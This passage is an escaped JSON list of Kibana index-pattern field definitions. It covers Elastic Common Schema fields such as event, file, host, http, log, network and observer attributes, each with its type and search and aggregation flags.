},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.accessed\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.attributes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.ctime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.device\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.drive_letter\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.gid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.group\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.inode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mime_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.mtime\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.owner\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.target_path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.target_path\"}}},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.uid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.full_name\"}}},{\"count\":0,\"name\":\"host.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.user.name\"}}},{\"count\":0,\"name\":\"http.request.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.request.body.content\"}}},{\"count\":0,\"name\":\"http.request.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.method\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.request.referrer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.body.content.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"http.response.body.content\"}}},{\"count\":0,\"name\":\"http.response.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.response.status_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"http.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"network.application\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.community_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.direction\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.forwarded_ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.iana_number\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.inner.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.transport\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"network.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.egress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.alias\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.interface.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"observer.ingress.zone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,